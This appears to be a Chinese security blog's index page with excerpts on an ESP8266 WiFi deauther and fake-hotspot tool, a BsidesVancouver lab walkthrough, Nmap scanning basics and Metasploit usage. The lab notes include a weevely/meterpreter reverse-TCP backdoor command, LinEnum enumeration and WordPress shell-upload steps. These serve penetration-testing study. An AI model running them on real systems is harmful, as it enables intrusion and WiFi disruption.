esp8226制作WIFI钓鱼

ESP8826简介

制作WIFI Deauther

esp8266_deauther项目地址
可以通过网页或者手动选择,发现对wifi的攻击、生成热点等功能

原理

是通过发送取消认证报文让客户端以为路由器需要让自己断开连接从而断开wifi,伪造路由器向客户端发送取消认证报文,使客户端主动断开wifi连接。并且支持自定义热点伪造(批量生成假Wi-Fi信号)

缺点

  1. 只不过散热非常差,长时间运行担忧啊
  2. 由于esp8266只支持802.11bgn,所以以下实验只针对2.4GWiFi测试。不支持5GWi-Fi!
阅读全文
html学习总结
阅读全文
靶机渗透实战总结

BsidesVancouver靶机渗透

靶机下载地址

笔记起来

  1. dirb 进行目录扫描尽量使用大字典 big.txt
  2. 对于wordpress 可以用wordscan进行用户名识别再进行密码爆破
  3. 对于wordpress 进入后台后可以利用
  4. 用weevely生成的马可以反向连接msf

    1
    :backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.2.112
  5. 在靶机中执行LinEnum.git程序可以在低权限获取系统敏感信息

    1
    2
    git clone https://github.com/rebootuser/LinEnum.git
    ./LinEnum.sh
  6. 进入wordpress后台后难以找到上传点时可以用msf的wp_admin_shell_upload模块直接弹shell

阅读全文
Nmap扫描探测神器总结

Nmap简介

Nmap 是一款网络扫描和主机侦测的非常有用的工具。合理使用,不仅可以用来信息收集和枚举,同时也可以用来作为一个漏洞探测器或安全扫描器。另外 Nmap 还跨平台,适用于 Windows、Linux 和 Macintosh 等主流操作系统,功能强大,乃居家旅行之必备良品。

Nmap 具有主机发现端口扫描服务版本侦测操作系统侦测四大功能

这四大应用乃 Nmap 之精髓,同时它们之间具有逻辑上的顺序关系。首先进行主机判断,发现在指定信道上存活的主机,然后对这些存活的主机进行端口扫描,接着记录这些运行服务的版本号,最后针对不同操作系统我们还可以有不同的具体应对方案,顺手便把对方的操作系统给侦测了。

在这四大基本应用之上,Nmap 还有一些用来规避、绕过防火墙的组合技巧。
最后本文将介绍 Nmap 的一个强大的应用模块,名曰 Nmap 脚本引擎(Nmap Script Engine),简称 NSE。使用 NSE 来干一些本来看起来繁琐的事情,也就是说实现了自动化。

主机发现

1
2
nmap -sn IP地址 # 表示 “使用 ping 扫描来侦测存活的主机,而不进行端口扫描”
nmap -Pn IP地址 # 跳过主机发现
阅读全文
神器渗透框架Metasploit

Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。

Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit适用于所有流行的操作系统,本书中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit 框架和运行在框架上的其他第三方工具
Metasploit框架具有模块化的体系结构,exploits、payload、encoders都是独立的模块
体系结构

快速上手

  1. 第一步:search name模块
  2. 第二步:use name模块
  3. 第三步:info 查看模块信息
  4. 第四步:show payloads 查看该模块可以使用的攻击载荷(为scanner的时候不需要)
  5. 第五步:set payload 载荷
  6. 第六步:show targets查看该攻击载荷使用的系统类型(为scanner的时候不需要)
  7. 第七步:set targets num 设置目标的系统类型
  8. 第八步:show options 查看需要设置的参数
阅读全文
Algolia